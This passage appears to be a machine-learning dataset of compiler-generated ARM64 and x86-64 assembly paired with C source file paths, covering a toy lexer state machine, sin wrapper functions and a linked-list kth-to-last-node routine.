ldur w8, [x29, #-4]
subs w8, w8, #4
cset w8, ne
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_25
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #5
cset w8, ne
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_24
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #6
cset w8, ne
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_23
LBB0_11: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #7
cset w8, ne
tbnz w8, #0, LBB0_13
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_22
LBB0_13: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #8
cset w8, ne
tbnz w8, #0, LBB0_15
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_21
LBB0_15: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #9
cset w8, ne
tbnz w8, #0, LBB0_17
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_20
LBB0_17: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #3
cset w8, ne
tbnz w8, #0, LBB0_19
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_1 Depth=1
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_1 Depth=1
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_1 Depth=1
b LBB0_22
LBB0_22: ; in Loop: Header=BB0_1 Depth=1
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_1 Depth=1
b LBB0_24
LBB0_24: ; in Loop: Header=BB0_1 Depth=1
b LBB0_25
LBB0_25: ; in Loop: Header=BB0_1 Depth=1
b LBB0_26
LBB0_26: ; in Loop: Header=BB0_1 Depth=1
b LBB0_27
LBB0_27: ; in Loop: Header=BB0_1 Depth=1
mov x9, sp
sub x8, x29, #5
str x8, [x9]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _scanf
ldursb w8, [x29, #-5]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB0_30
b LBB0_28
LBB0_28: ; in Loop: Header=BB0_1 Depth=1
ldursb w8, [x29, #-5]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB0_30
b LBB0_29
LBB0_29: ; in Loop: Header=BB0_1 Depth=1
ldursb w8, [x29, #-5]
subs w8, w8, #46
cset w8, eq
tbnz w8, #0, LBB0_31
b LBB0_30
LBB0_30: ; in Loop: Header=BB0_1 Depth=1
ldursb w10, [x29, #-5]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _printf
b LBB0_31
LBB0_31: ; in Loop: Header=BB0_1 Depth=1
ldur w0, [x29, #-4]
ldursb w1, [x29, #-5]
bl _transition
stur w0, [x29, #-4]
b LBB0_32
LBB0_32: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #13
cset w8, ne
tbnz w8, #0, LBB0_1
b LBB0_33
LBB0_33:
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _transition ; -- Begin function transition
.p2align 2
_transition: ; @transition
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str w0, [sp, #8]
strb w1, [sp, #7]
ldr w8, [sp, #8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_22
b LBB1_1
LBB1_1:
ldrsb w0, [sp, #7]
bl _isdigit
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB1_3
b LBB1_2
LBB1_2:
mov w8, #11
stur w8, [x29, #-4]
b LBB1_46
LBB1_3:
ldrsb w0, [sp, #7]
bl _isalpha
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB1_5
b LBB1_4
LBB1_4:
mov w8, #10
stur w8, [x29, #-4]
b LBB1_46
LBB1_5:
ldrsb w8, [sp, #7]
subs w8, w8, #43
cset w8, ne
tbnz w8, #0, LBB1_7
b LBB1_6
LBB1_6:
mov w8, #4
stur w8, [x29, #-4]
b LBB1_46
LBB1_7:
ldrsb w8, [sp, #7]
subs w8, w8, #45
cset w8, ne
tbnz w8, #0, LBB1_9
b LBB1_8
LBB1_8:
mov w8, #5
stur w8, [x29, #-4]
b LBB1_46
LBB1_9:
ldrsb w8, [sp, #7]
subs w8, w8, #42
cset w8, ne
tbnz w8, #0, LBB1_11
b LBB1_10
LBB1_10:
mov w8, #6
stur w8, [x29, #-4]
b LBB1_46
LBB1_11:
ldrsb w8, [sp, #7]
subs w8, w8, #47
cset w8, ne
tbnz w8, #0, LBB1_13
b LBB1_12
LBB1_12:
mov w8, #7
stur w8, [x29, #-4]
b LBB1_46
LBB1_13:
ldrsb w8, [sp, #7]
subs w8, w8, #61
cset w8, ne
tbnz w8, #0, LBB1_15
b LBB1_14
LBB1_14:
mov w8, #8
stur w8, [x29, #-4]
b LBB1_46
LBB1_15:
ldrsb w8, [sp, #7]
subs w8, w8, #59
cset w8, ne
tbnz w8, #0, LBB1_17
b LBB1_16
LBB1_16:
mov w8, #9
stur w8, [x29, #-4]
b LBB1_46
LBB1_17:
ldrsb w8, [sp, #7]
subs w8, w8, #46
cset w8, ne
tbnz w8, #0, LBB1_19
b LBB1_18
LBB1_18:
mov w8, #13
stur w8, [x29, #-4]
b LBB1_46
LBB1_19:
ldrsb w8, [sp, #7]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB1_21
b LBB1_20
LBB1_20:
stur wzr, [x29, #-4]
b LBB1_46
LBB1_21:
stur wzr, [x29, #-4]
b LBB1_46
LBB1_22:
ldr w8, [sp, #8]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB1_31
b LBB1_23
LBB1_23:
ldrsb w0, [sp, #7]
bl _isdigit
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB1_25
b LBB1_24
LBB1_24:
mov w8, #10
stur w8, [x29, #-4]
b LBB1_46
LBB1_25:
ldrsb w0, [sp, #7]
bl _isalpha
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_27
b LBB1_26
LBB1_26:
ldrsb w8, [sp, #7]
subs w8, w8, #95
cset w8, ne
tbnz w8, #0, LBB1_28
b LBB1_27
LBB1_27:
mov w8, #10
stur w8, [x29, #-4]
b LBB1_46
LBB1_28:
ldrsb w8, [sp, #7]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB1_30
b LBB1_29
LBB1_29:
mov w8, #1
stur w8, [x29, #-4]
b LBB1_46
LBB1_30:
b LBB1_31
LBB1_31:
ldr w8, [sp, #8]
subs w8, w8, #11
cset w8, ne
tbnz w8, #0, LBB1_39
b LBB1_32
LBB1_32:
ldrsb w0, [sp, #7]
bl _isdigit
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB1_34
b LBB1_33
LBB1_33:
mov w8, #11
stur w8, [x29, #-4]
b LBB1_46
LBB1_34:
ldrsb w8, [sp, #7]
subs w8, w8, #46
cset w8, ne
tbnz w8, #0, LBB1_36
b LBB1_35
LBB1_35:
mov w8, #12
stur w8, [x29, #-4]
b LBB1_46
LBB1_36:
ldrsb w8, [sp, #7]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB1_38
b LBB1_37
LBB1_37:
mov w8, #2
stur w8, [x29, #-4]
b LBB1_46
LBB1_38:
b LBB1_39
LBB1_39:
ldr w8, [sp, #8]
subs w8, w8, #12
cset w8, ne
tbnz w8, #0, LBB1_45
b LBB1_40
LBB1_40:
ldrsb w0, [sp, #7]
bl _isdigit
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB1_42
b LBB1_41
LBB1_41:
mov w8, #12
stur w8, [x29, #-4]
b LBB1_46
LBB1_42:
ldrsb w8, [sp, #7]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB1_44
b LBB1_43
LBB1_43:
mov w8, #3
stur w8, [x29, #-4]
b LBB1_46
LBB1_44:
b LBB1_45
LBB1_45:
mov w8, #13
stur w8, [x29, #-4]
b LBB1_46
LBB1_46:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz " \342\200\223 Identifier\n"
l_.str.1: ; @.str.1
.asciz " \342\200\223 Number\n"
l_.str.2: ; @.str.2
.asciz " \342\200\223 Add Operator\n"
l_.str.3: ; @.str.3
.asciz " \342\200\223 Minus Operator\n"
l_.str.4: ; @.str.4
.asciz " \342\200\223 Multiplication Operator\n"
l_.str.5: ; @.str.5
.asciz " \342\200\223 Division Operator\n"
l_.str.6: ; @.str.6
.asciz " \342\200\223 Assignment Operator\n"
l_.str.7: ; @.str.7
.asciz " \342\200\223 Statement Termination Operator\n"
l_.str.8: ; @.str.8
.asciz " \342\200\223 Floating Point Number\n"
l_.str.9: ; @.str.9
.asciz "%c"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movb $32, -5(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $1, -4(%rbp)
jne LBB0_3
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_27
LBB0_3: ## in Loop: Header=BB0_1 Depth=1
cmpl $2, -4(%rbp)
jne LBB0_5
## %bb.4: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_26
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
cmpl $4, -4(%rbp)
jne LBB0_7
## %bb.6: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_25
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
cmpl $5, -4(%rbp)
jne LBB0_9
## %bb.8: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_24
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
cmpl $6, -4(%rbp)
jne LBB0_11
## %bb.10: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_23
LBB0_11: ## in Loop: Header=BB0_1 Depth=1
cmpl $7, -4(%rbp)
jne LBB0_13
## %bb.12: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_22
LBB0_13: ## in Loop: Header=BB0_1 Depth=1
cmpl $8, -4(%rbp)
jne LBB0_15
## %bb.14: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_21
LBB0_15: ## in Loop: Header=BB0_1 Depth=1
cmpl $9, -4(%rbp)
jne LBB0_17
## %bb.16: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_20
LBB0_17: ## in Loop: Header=BB0_1 Depth=1
cmpl $3, -4(%rbp)
jne LBB0_19
## %bb.18: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
LBB0_19: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_20
LBB0_20: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_21
LBB0_21: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_22
LBB0_22: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_23
LBB0_23: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_24
LBB0_24: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_25
LBB0_25: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_26
LBB0_26: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_27
LBB0_27: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.9(%rip), %rdi
leaq -5(%rbp), %rsi
movb $0, %al
callq _scanf
movsbl -5(%rbp), %eax
cmpl $32, %eax
jne LBB0_30
## %bb.28: ## in Loop: Header=BB0_1 Depth=1
movsbl -5(%rbp), %eax
cmpl $10, %eax
jne LBB0_30
## %bb.29: ## in Loop: Header=BB0_1 Depth=1
movsbl -5(%rbp), %eax
cmpl $46, %eax
je LBB0_31
LBB0_30: ## in Loop: Header=BB0_1 Depth=1
movsbl -5(%rbp), %esi
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _printf
LBB0_31: ## in Loop: Header=BB0_1 Depth=1
movl -4(%rbp), %edi
movsbl -5(%rbp), %esi
callq _transition
movl %eax, -4(%rbp)
## %bb.32: ## in Loop: Header=BB0_1 Depth=1
cmpl $13, -4(%rbp)
jne LBB0_1
## %bb.33:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _transition ## -- Begin function transition
.p2align 4, 0x90
_transition: ## @transition
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movb %sil, %al
movl %edi, -8(%rbp)
movb %al, -9(%rbp)
cmpl $0, -8(%rbp)
jne LBB1_22
## %bb.1:
movsbl -9(%rbp), %edi
callq _isdigit
cmpl $0, %eax
je LBB1_3
## %bb.2:
movl $11, -4(%rbp)
jmp LBB1_46
LBB1_3:
movsbl -9(%rbp), %edi
callq _isalpha
cmpl $0, %eax
je LBB1_5
## %bb.4:
movl $10, -4(%rbp)
jmp LBB1_46
LBB1_5:
movsbl -9(%rbp), %eax
cmpl $43, %eax
jne LBB1_7
## %bb.6:
movl $4, -4(%rbp)
jmp LBB1_46
LBB1_7:
movsbl -9(%rbp), %eax
cmpl $45, %eax
jne LBB1_9
## %bb.8:
movl $5, -4(%rbp)
jmp LBB1_46
LBB1_9:
movsbl -9(%rbp), %eax
cmpl $42, %eax
jne LBB1_11
## %bb.10:
movl $6, -4(%rbp)
jmp LBB1_46
LBB1_11:
movsbl -9(%rbp), %eax
cmpl $47, %eax
jne LBB1_13
## %bb.12:
movl $7, -4(%rbp)
jmp LBB1_46
LBB1_13:
movsbl -9(%rbp), %eax
cmpl $61, %eax
jne LBB1_15
## %bb.14:
movl $8, -4(%rbp)
jmp LBB1_46
LBB1_15:
movsbl -9(%rbp), %eax
cmpl $59, %eax
jne LBB1_17
## %bb.16:
movl $9, -4(%rbp)
jmp LBB1_46
LBB1_17:
movsbl -9(%rbp), %eax
cmpl $46, %eax
jne LBB1_19
## %bb.18:
movl $13, -4(%rbp)
jmp LBB1_46
LBB1_19:
movsbl -9(%rbp), %eax
cmpl $32, %eax
jne LBB1_21
## %bb.20:
movl $0, -4(%rbp)
jmp LBB1_46
LBB1_21:
movl $0, -4(%rbp)
jmp LBB1_46
LBB1_22:
cmpl $10, -8(%rbp)
jne LBB1_31
## %bb.23:
movsbl -9(%rbp), %edi
callq _isdigit
cmpl $0, %eax
je LBB1_25
## %bb.24:
movl $10, -4(%rbp)
jmp LBB1_46
LBB1_25:
movsbl -9(%rbp), %edi
callq _isalpha
cmpl $0, %eax
jne LBB1_27
## %bb.26:
movsbl -9(%rbp), %eax
cmpl $95, %eax
jne LBB1_28
LBB1_27:
movl $10, -4(%rbp)
jmp LBB1_46
LBB1_28:
movsbl -9(%rbp), %eax
cmpl $32, %eax
jne LBB1_30
## %bb.29:
movl $1, -4(%rbp)
jmp LBB1_46
LBB1_30:
jmp LBB1_31
LBB1_31:
cmpl $11, -8(%rbp)
jne LBB1_39
## %bb.32:
movsbl -9(%rbp), %edi
callq _isdigit
cmpl $0, %eax
je LBB1_34
## %bb.33:
movl $11, -4(%rbp)
jmp LBB1_46
LBB1_34:
movsbl -9(%rbp), %eax
cmpl $46, %eax
jne LBB1_36
## %bb.35:
movl $12, -4(%rbp)
jmp LBB1_46
LBB1_36:
movsbl -9(%rbp), %eax
cmpl $32, %eax
jne LBB1_38
## %bb.37:
movl $2, -4(%rbp)
jmp LBB1_46
LBB1_38:
jmp LBB1_39
LBB1_39:
cmpl $12, -8(%rbp)
jne LBB1_45
## %bb.40:
movsbl -9(%rbp), %edi
callq _isdigit
cmpl $0, %eax
je LBB1_42
## %bb.41:
movl $12, -4(%rbp)
jmp LBB1_46
LBB1_42:
movsbl -9(%rbp), %eax
cmpl $32, %eax
jne LBB1_44
## %bb.43:
movl $3, -4(%rbp)
jmp LBB1_46
LBB1_44:
jmp LBB1_45
LBB1_45:
movl $13, -4(%rbp)
LBB1_46:
movl -4(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz " \342\200\223 Identifier\n"
L_.str.1: ## @.str.1
.asciz " \342\200\223 Number\n"
L_.str.2: ## @.str.2
.asciz " \342\200\223 Add Operator\n"
L_.str.3: ## @.str.3
.asciz " \342\200\223 Minus Operator\n"
L_.str.4: ## @.str.4
.asciz " \342\200\223 Multiplication Operator\n"
L_.str.5: ## @.str.5
.asciz " \342\200\223 Division Operator\n"
L_.str.6: ## @.str.6
.asciz " \342\200\223 Assignment Operator\n"
L_.str.7: ## @.str.7
.asciz " \342\200\223 Statement Termination Operator\n"
L_.str.8: ## @.str.8
.asciz " \342\200\223 Floating Point Number\n"
L_.str.9: ## @.str.9
.asciz "%c"
.subsections_via_symbols
| the_stack_data/29826731.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/37637801.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/1183901.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _sinfrob ; -- Begin function sinfrob
.p2align 2
_sinfrob: ; @sinfrob
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x9, _i@GOTPAGE
ldr x9, [x9, _i@GOTPAGEOFF]
str x9, [sp] ; 8-byte Folded Spill
str d0, [sp, #8]
ldr x8, [x9]
add x8, x8, #1
str x8, [x9]
ldr d0, [sp, #8]
bl _sin
ldr x9, [sp] ; 8-byte Folded Reload
str d0, [sp, #8]
ldr x8, [x9]
add x8, x8, #1
str x8, [x9]
ldr d0, [sp, #8]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _sinblah ; -- Begin function sinblah
.p2align 2
_sinblah: ; @sinblah
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x9, _i@GOTPAGE
ldr x9, [x9, _i@GOTPAGEOFF]
str x9, [sp] ; 8-byte Folded Spill
str d0, [sp, #8]
ldr x8, [x9]
add x8, x8, #1
str x8, [x9]
ldr d0, [sp, #8]
bl _sin
ldr x9, [sp] ; 8-byte Folded Reload
str d0, [sp, #8]
ldr x8, [x9]
add x8, x8, #1
str x8, [x9]
ldr d0, [sp, #8]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _sinfrob ## -- Begin function sinfrob
.p2align 4, 0x90
_sinfrob: ## @sinfrob
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movsd %xmm0, -8(%rbp)
movq _i@GOTPCREL(%rip), %rax
movq (%rax), %rcx
addq $1, %rcx
movq _i@GOTPCREL(%rip), %rax
movq %rcx, (%rax)
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
callq _sin
movsd %xmm0, -8(%rbp)
movq _i@GOTPCREL(%rip), %rax
movq (%rax), %rcx
addq $1, %rcx
movq _i@GOTPCREL(%rip), %rax
movq %rcx, (%rax)
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _sinblah ## -- Begin function sinblah
.p2align 4, 0x90
_sinblah: ## @sinblah
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movsd %xmm0, -8(%rbp)
movq _i@GOTPCREL(%rip), %rax
movq (%rax), %rcx
addq $1, %rcx
movq _i@GOTPCREL(%rip), %rax
movq %rcx, (%rax)
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
callq _sin
movsd %xmm0, -8(%rbp)
movq _i@GOTPCREL(%rip), %rax
movq (%rax), %rcx
addq $1, %rcx
movq _i@GOTPCREL(%rip), %rax
movq %rcx, (%rax)
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/173578178.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _newNode ; -- Begin function newNode
.p2align 2
_newNode: ; @newNode
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov x0, #16
bl _malloc
str x0, [sp, #8]
ldr x8, [sp, #8]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
ldr x0, [sp, #8]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _addNode ; -- Begin function addNode
.p2align 2
_addNode: ; @addNode
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_3
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
stur x8, [x29, #-8]
b LBB1_1
LBB1_3:
bl _newNode
str x0, [sp, #8]
ldur w8, [x29, #-12]
ldr x9, [sp, #8]
str w8, [x9]
ldr x8, [sp, #8]
ldur x9, [x29, #-8]
str x8, [x9, #8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _printList ; -- Begin function printList
.p2align 2
_printList: ; @printList
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
ldr x8, [sp, #8]
ldr x8, [x8, #8]
str x8, [sp, #8]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_3
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp, #8]
ldr w9, [x8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldr x8, [sp, #8]
ldr x8, [x8, #8]
str x8, [sp, #8]
b LBB2_1
LBB2_3:
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _findkthToLastNode ; -- Begin function findkthToLastNode
.p2align 2
_findkthToLastNode: ; @findkthToLastNode
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #32]
str w1, [sp, #28]
ldr x8, [sp, #32]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_2
b LBB3_1
LBB3_1:
ldr w8, [sp, #28]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB3_3
b LBB3_2
LBB3_2:
; kill: def $x8 killed $xzr
str xzr, [sp, #40]
b LBB3_14
LBB3_3:
ldr x8, [sp, #32]
ldr x8, [x8, #8]
str x8, [sp, #16]
ldr x8, [sp, #32]
ldr x8, [x8, #8]
str x8, [sp, #8]
str wzr, [sp, #4]
b LBB3_4
LBB3_4: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #4]
ldr w9, [sp, #28]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_10
b LBB3_5
LBB3_5: ; in Loop: Header=BB3_4 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_7
b LBB3_6
LBB3_6: ; in Loop: Header=BB3_4 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
str x8, [sp, #16]
b LBB3_8
LBB3_7:
; kill: def $x8 killed $xzr
str xzr, [sp, #40]
b LBB3_14
LBB3_8: ; in Loop: Header=BB3_4 Depth=1
b LBB3_9
LBB3_9: ; in Loop: Header=BB3_4 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB3_4
LBB3_10:
b LBB3_11
LBB3_11: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_13
b LBB3_12
LBB3_12: ; in Loop: Header=BB3_11 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
str x8, [sp, #16]
ldr x8, [sp, #8]
ldr x8, [x8, #8]
str x8, [sp, #8]
b LBB3_11
LBB3_13:
ldr x8, [sp, #8]
str x8, [sp, #40]
b LBB3_14
LBB3_14:
ldr x0, [sp, #40]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-48]
stur w0, [x29, #-52]
str x1, [sp, #48]
sub x0, x29, #44
adrp x1, l___const.main.a@PAGE
add x1, x1, l___const.main.a@PAGEOFF
mov x2, #36
bl _memcpy
